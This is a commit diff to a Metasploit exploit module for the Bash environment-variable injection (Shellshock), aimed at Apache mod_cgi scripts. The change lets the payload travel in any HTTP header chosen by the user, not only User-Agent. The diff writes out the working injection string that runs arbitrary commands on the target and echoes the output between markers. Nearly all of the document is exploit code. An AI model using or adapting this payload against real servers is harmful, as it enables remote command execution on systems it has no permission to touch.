commit
ffe5aafb2f
|
@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a code injection in specially crafted environment
|
||||
variables in Bash, specifically targeting Apache mod_cgi scripts through
|
||||
the HTTP_USER_AGENT variable.
|
||||
the HTTP_USER_AGENT variable by default.
|
||||
},
|
||||
'Author' => [
|
||||
'Stephane Chazelas', # Vulnerability discovery
|
||||
|
@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'Path to CGI script']),
|
||||
OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
|
||||
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
|
||||
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
|
||||
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
|
||||
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
|
||||
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
|
||||
|
@ -117,7 +118,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
{
|
||||
'method' => datastore['METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
|
||||
'headers' => {
|
||||
datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
|
||||
}
|
||||
}, datastore['TIMEOUT'])
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue